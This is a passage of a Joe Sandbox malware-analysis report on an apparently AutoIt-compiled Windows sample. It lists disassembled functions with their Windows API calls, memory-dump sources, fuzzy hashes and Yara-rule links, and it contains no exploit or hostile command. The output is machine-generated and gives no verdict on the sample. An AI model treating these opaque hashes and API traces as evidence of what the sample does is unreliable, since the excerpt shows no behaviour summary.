                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                        • String ID:
                                                                                        • API String ID: 395352322-0
                                                                                        • Opcode ID: b5131dabd4a2a67cadfd2e986b415e323ff756628087c751aedefec5cbf298fe
                                                                                        • Instruction ID: 3e22e70b6f2616eb7250a30d7d8a48524582d6e50c9a57dc89dcd50e66651605
                                                                                        • Opcode Fuzzy Hash: b5131dabd4a2a67cadfd2e986b415e323ff756628087c751aedefec5cbf298fe
                                                                                        • Instruction Fuzzy Hash: E2311D71900109BFDB15AF90DC89EFFB7BCEF09300F10096BE501E2251D6745E8A9BA9
                                                                                        Function 004862CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 004862EC
                                                                                        • GetWindowLongW.USER32(00CD3038,000000F0), ref: 0048631F
                                                                                        • GetWindowLongW.USER32(00CD3038,000000F0), ref: 00486354
                                                                                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00486386
                                                                                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 004863B0
                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 004863C1
                                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004863DB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: LongWindow$MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 2178440468-0
                                                                                        • Opcode ID: b6c63574b2784a6fe8e125d212b22f8229395cc3faf42e06ca4ca63f68dab27c
                                                                                        • Instruction ID: de0077e50bd3e6fac1d65856e76e1ec94ed34838b8122e9b1a950ed70c11c10c
                                                                                        • Opcode Fuzzy Hash: b6c63574b2784a6fe8e125d212b22f8229395cc3faf42e06ca4ca63f68dab27c
                                                                                        • Instruction Fuzzy Hash: 2B3125306001509FDB61EF18EC84F6E37E1FB4A714F1A05B9F9009F2B1CB75A8849B59
                                                                                        Function 00476173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00477D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00477DB6
                                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 004761C6
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 004761D5
                                                                                        • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0047620E
                                                                                        • connect.WSOCK32(00000000,?,00000010), ref: 00476217
                                                                                        • WSAGetLastError.WSOCK32 ref: 00476221
                                                                                        • closesocket.WSOCK32(00000000), ref: 0047624A
                                                                                        • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00476263
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                                        • String ID:
                                                                                        • API String ID: 910771015-0
                                                                                        • Opcode ID: 2c772d8cd10b281ebb58c123377a2f6f77deb8af44f3e8561ff8297571aede33
                                                                                        • Instruction ID: 9a8db824e4f103e753759010288aef610dd859574b1bdde890bb221953e34ba6
                                                                                        • Opcode Fuzzy Hash: 2c772d8cd10b281ebb58c123377a2f6f77deb8af44f3e8561ff8297571aede33
                                                                                        • Instruction Fuzzy Hash: E131C671600104ABDF10BF64CC85BBE77ADEB45714F05846EFD09A7292DB78AC088B65
                                                                                        Function 0045F65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: __wcsnicmp
                                                                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                        • API String ID: 1038674560-2734436370
                                                                                        • Opcode ID: 842b6d77a2cf942784fc1cb80210373f95780450b82a097604e26ce594b18ecd
                                                                                        • Instruction ID: 032906fc094d91378a6d64986483b761754d261e1b02b5d61cc05f8db2f6dc85
                                                                                        • Opcode Fuzzy Hash: 842b6d77a2cf942784fc1cb80210373f95780450b82a097604e26ce594b18ecd
                                                                                        • Instruction Fuzzy Hash: E621487220412166D620AA35AC02FA773D8AF59305B90443BFC4286192EB9C9D4EC29F
                                                                                        Function 004875CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                                                                                          • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                                                                                          • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00487632
                                                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0048763F
                                                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0048764A
                                                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00487659
                                                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00487665
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                                                        • String ID: Msctls_Progress32
                                                                                        • API String ID: 1025951953-3636473452
                                                                                        • Opcode ID: 89b1357e1ee64075d60cbe96e93ddb663670d2e9d7f59c86534f55b80d263953
                                                                                        • Instruction ID: 4837c572468b061b20148283283cd62aa6e96b5405c17b40ad05b898919227a4
                                                                                        • Opcode Fuzzy Hash: 89b1357e1ee64075d60cbe96e93ddb663670d2e9d7f59c86534f55b80d263953
                                                                                        • Instruction Fuzzy Hash: B711D3B1110119BFEF109F64CC85EEB7F5DEF083A8F114115BA04A21A0D776AC21DBA8
                                                                                        Function 0048B635 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 0048B644
                                                                                        • _memset.LIBCMT ref: 0048B653
                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,004C6F20,004C6F64), ref: 0048B682
                                                                                        • CloseHandle.KERNEL32 ref: 0048B694
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memset$CloseCreateHandleProcess
                                                                                        • String ID: oL$doL
                                                                                        • API String ID: 3277943733-3421622115
                                                                                        • Opcode ID: f6592324f54b6d11ff0072cf87150bc2a8f8a0fa5e3a8a7e269d397b8f6a706e
                                                                                        • Instruction ID: 7a1fecbce043cfc874fe0d77b44da30ff063324afa3e4e90fef9887594455fd0
                                                                                        • Opcode Fuzzy Hash: f6592324f54b6d11ff0072cf87150bc2a8f8a0fa5e3a8a7e269d397b8f6a706e
                                                                                        • Instruction Fuzzy Hash: 20F05EB26403107AE2502761BC06FBB3A9CEB08395F41843ABE08E5192D7799C00C7AC
                                                                                        Function 0042406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00423F85), ref: 00424085
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0042408C
                                                                                        • EncodePointer.KERNEL32(00000000), ref: 00424097
                                                                                        • DecodePointer.KERNEL32(00423F85), ref: 004240B2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                        • String ID: RoUninitialize$combase.dll
                                                                                        • API String ID: 3489934621-2819208100
                                                                                        • Opcode ID: a073a7a123edb79e47074a0cfae65335df484428d24780242fe31235a0946bf9
                                                                                        • Instruction ID: 3c20c996fd7074992a56bc66f3091c9a5c2557e351e9bc0918c4c0f6e68dcf68
                                                                                        • Opcode Fuzzy Hash: a073a7a123edb79e47074a0cfae65335df484428d24780242fe31235a0946bf9
                                                                                        • Instruction Fuzzy Hash: DBE09270681200AFEA90AF62ED0DB8A3AA5B704743F14893AF501E11A0CFBA46489B1C
                                                                                        Function 004664B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove$__itow__swprintf
                                                                                        • String ID:
                                                                                        • API String ID: 3253778849-0
                                                                                        • Opcode ID: 7a9d2276f8bc6090ad2ff2e4bc0facee7f220cdfea25bb18be49390af5a0a179
                                                                                        • Instruction ID: 21da70feb02ff46742cf7b1a596b1e1f747712b30ca55ffc0ed3d6fa2aea8e56
                                                                                        • Opcode Fuzzy Hash: 7a9d2276f8bc6090ad2ff2e4bc0facee7f220cdfea25bb18be49390af5a0a179
                                                                                        • Instruction Fuzzy Hash: 6261707160025A9BCF01EF61DC81AFE37A5AF05308F45452EF8556B293EB38AD05CB5A
                                                                                        Function 004801E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                          • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004802BD
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004802FD
                                                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00480320
                                                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00480349
                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0048038C
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00480399
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 4046560759-0
                                                                                        • Opcode ID: bf692df503075bba793d5cc951f82f829aed1168ab2e61a26274d242b60a892a
                                                                                        • Instruction ID: d871ff08e979a7a46cd08627f86c845b9cb8169993b1d7d4ad27b4e2648fe78e
                                                                                        • Opcode Fuzzy Hash: bf692df503075bba793d5cc951f82f829aed1168ab2e61a26274d242b60a892a
                                                                                        • Instruction Fuzzy Hash: 68515C71118204AFC710EF65C885E6FBBE8FF85318F04492EF945972A2DB35E909CB56
                                                                                        Function 00485799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetMenu.USER32(?), ref: 004857FB
                                                                                        • GetMenuItemCount.USER32(00000000), ref: 00485832
                                                                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0048585A
                                                                                        • GetMenuItemID.USER32(?,?), ref: 004858C9
                                                                                        • GetSubMenu.USER32(?,?), ref: 004858D7
                                                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 00485928
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Item$CountMessagePostString
                                                                                        • String ID:
                                                                                        • API String ID: 650687236-0
                                                                                        • Opcode ID: fad01ffac506ac452b0c02e795c4ae8801d71ba59cba857f2c5d01f3afad97ac
                                                                                        • Instruction ID: f019c79df8c938943ad8434395c060b2cb7e18679ec399e957168710705cd923
                                                                                        • Opcode Fuzzy Hash: fad01ffac506ac452b0c02e795c4ae8801d71ba59cba857f2c5d01f3afad97ac
                                                                                        • Instruction Fuzzy Hash: 72514C75E00615AFCF11EF65C845AAEBBB4EF48314F10446AE801BB352DB78AE418B99
                                                                                        Function 0045EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VariantInit.OLEAUT32(?), ref: 0045EF06
                                                                                        • VariantClear.OLEAUT32(00000013), ref: 0045EF78
                                                                                        • VariantClear.OLEAUT32(00000000), ref: 0045EFD3
                                                                                        • _memmove.LIBCMT ref: 0045EFFD
                                                                                        • VariantClear.OLEAUT32(?), ref: 0045F04A
                                                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0045F078
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 1101466143-0
                                                                                        • Opcode ID: 3a696c756d5f9f21b3064a47137a411a2eda9f735d8382ec367d4cfec0c8664e
                                                                                        • Instruction ID: 3df6c570488be2a998a5abfaea7cf2d50daf9fdb1352742cca5bf42246c3e2d0
                                                                                        • Opcode Fuzzy Hash: 3a696c756d5f9f21b3064a47137a411a2eda9f735d8382ec367d4cfec0c8664e
                                                                                        • Instruction Fuzzy Hash: 04517D75A00209EFCB14CF58C884AAAB7B8FF4C314B15856AED49DB342E334E915CF94
                                                                                        Function 0046220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00462258
                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004622A3
                                                                                        • IsMenu.USER32(00000000), ref: 004622C3
                                                                                        • CreatePopupMenu.USER32 ref: 004622F7
                                                                                        • GetMenuItemCount.USER32(000000FF), ref: 00462355
                                                                                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00462386
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                        • String ID:
                                                                                        • API String ID: 3311875123-0
                                                                                        • Opcode ID: cf97df88117ddcc5f0fa513269a15dde7708b163d82bf74e49b6c8debfa24165
                                                                                        • Instruction ID: 667f6c59849a63ea2ae133147cac6ec600f1389f3bfda063d60b04a3024e98c7
                                                                                        • Opcode Fuzzy Hash: cf97df88117ddcc5f0fa513269a15dde7708b163d82bf74e49b6c8debfa24165
                                                                                        • Instruction Fuzzy Hash: 0F51A370500649FBDF21CF64CA44B9EBBF5BF05318F10456AE81197390E3B88985CB5B
                                                                                        Function 00401765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                        • BeginPaint.USER32(?,?,?,?,?,?), ref: 0040179A
                                                                                        • GetWindowRect.USER32(?,?), ref: 004017FE
                                                                                        • ScreenToClient.USER32(?,?), ref: 0040181B
                                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0040182C
                                                                                        • EndPaint.USER32(?,?), ref: 00401876
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                        • String ID:
                                                                                        • API String ID: 1827037458-0
                                                                                        • Opcode ID: d9366b8442643d94811bf82364bc44e8890a7fb11cafe672375ae29e37d5b646
                                                                                        • Instruction ID: 802354e609c34c5ad38a523f12b28351d49e30531d5e0f2791b792dab913329b
                                                                                        • Opcode Fuzzy Hash: d9366b8442643d94811bf82364bc44e8890a7fb11cafe672375ae29e37d5b646
                                                                                        • Instruction Fuzzy Hash: AF418E31100700AFD710EF25C884FAA7BE8EB49724F044A3EFA94962F1C734A945DB6A
                                                                                        Function 0048B69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ShowWindow.USER32(004C57B0,00000000,00CD3038,?,?,004C57B0,?,0048B5A8,?,?), ref: 0048B712
                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 0048B736
                                                                                        • ShowWindow.USER32(004C57B0,00000000,00CD3038,?,?,004C57B0,?,0048B5A8,?,?), ref: 0048B796
